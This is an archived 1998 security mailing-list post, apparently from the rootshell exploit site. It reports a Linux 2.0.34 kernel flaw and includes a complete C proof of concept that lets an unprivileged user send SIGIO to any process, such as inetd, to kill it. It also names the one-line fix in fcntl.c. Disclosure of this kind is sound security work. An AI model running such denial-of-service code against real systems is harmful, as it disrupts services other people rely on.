Return to index
|
Download NON-HTML Version
|
Add Comment
|
View Comments (0 comment(s))
[ http://www.rootshell.com/ ] Date: Tue, 30 Jun 1998 15:10:47 +0800 From: David Luyer <luyer@UCS.UWA.EDU.AU> Subject: Serious Linux 2.0.34 security problem I just saw this mentioned on linux-kernel and confirmed it; #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { int s, p; if(argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } This can kill from a normal user account the inetd process under Linux 2.0.34 by sending a SIGIO. Very bad. The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number is approximately 139. David.